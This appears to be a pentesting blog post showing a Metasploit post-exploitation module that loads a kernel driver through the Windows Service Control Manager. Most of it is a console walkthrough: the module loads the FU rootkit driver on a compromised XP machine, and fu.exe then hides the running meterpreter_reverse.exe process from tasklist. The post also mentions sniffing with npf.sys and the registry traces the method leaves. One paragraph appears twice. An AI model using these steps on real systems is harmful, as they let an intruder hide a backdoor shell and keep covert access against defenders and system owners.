Since life in kernel space is more stealthy, you may want to load your own rootkit kernel driver to hide your shell, some process or connection, etc. and thus make your post-exploitation work more covertly. Not only rootkits but other kind of drivers could be really useful for a pentester. For example, we can load the packet capture driver (npf.sys) from Winpcap if we have the intention to sniff or inject packets into the network to carry out further attacks.
A good and confortable way to load drivers is by using the Service Control Manager API interface which allows you to run and load a kernel driver in a safe way through functions such as CreateServiceA, OpenSCManagerA and OpenServiceA. Taking advantage of Services mixin I made a simple module to achieve this from Meterpreter. Let's see an example with the well-known FU rootkit driver.
A good and confortable way to load drivers is by using the Service Control Manager API interface which allows you to run and load a kernel driver in a safe way through functions such as CreateServiceA, OpenSCManagerA and OpenServiceA. Taking advantage of Services mixin I made a simple module to achieve this from Meterpreter. Let's see an example with the well-known FU rootkit driver.
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/driver_loader
msf post(driver_loader) > set driver_name FU_RK
driver_name => FU_RK
msf post(driver_loader) > set driver_path c:\\windows\\system32\\drivers\\fu.sys
driver_path =>c:\windows\system32\drivers\fu.sys
msf post(driver_loader) > set session 1
session => 1
msf post(driver_loader) > show options
Module options (post/windows/manage/driver_loader):
Name Current Setting Required Description
---- --------------- -------- -----------
DRIVER_NAME FU_RK yes Driver Name.
DRIVER_PATH c:\windows\system32\drivers\fu.sys yes Driver path in %SYSTEMROOT%.Example: c:\windows\system32\msf.sys
ERROR_TYPE ignore yes Error type. (accepted: ignore, normal, severe, critical)
SERVICE_TYPE kernel yes Service type. (accepted: kernel, file_system, adapter, recognizer)
SESSION 1 yes The session to run this module on.
START_TYPE auto yes Start type. (accepted: boot, system, auto, demand, disabled)
msf post(driver_loader) > exploit
[*] Service object added to the Service Control Manager database.
[+] Driver loaded successfully.
[*] Post module execution completed
We can verify that the driver was loaded successfully.
Now we can use fu.exe to hide some processes.
meterpreter > shell
Process 1972 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Test\Desktop>cd %TEMP%
cd %TEMP%
C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"
meterpreter_reverse.exe 1628 Console 0 7.360 K
C:\DOCUME~1\Test\LOCALS~1\Temp>fu -ph 1628
fu -ph 1628
C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"
C:\DOCUME~1\Test\LOCALS~1\Temp>
Note that a drawback of using SCM is that once the service has been installed, it will leave some artifacts in the registry under HKLM\SYSTEM\CurrentControlSet\Services which may raise suspicious from a forensic point of view.
No comments:
Post a Comment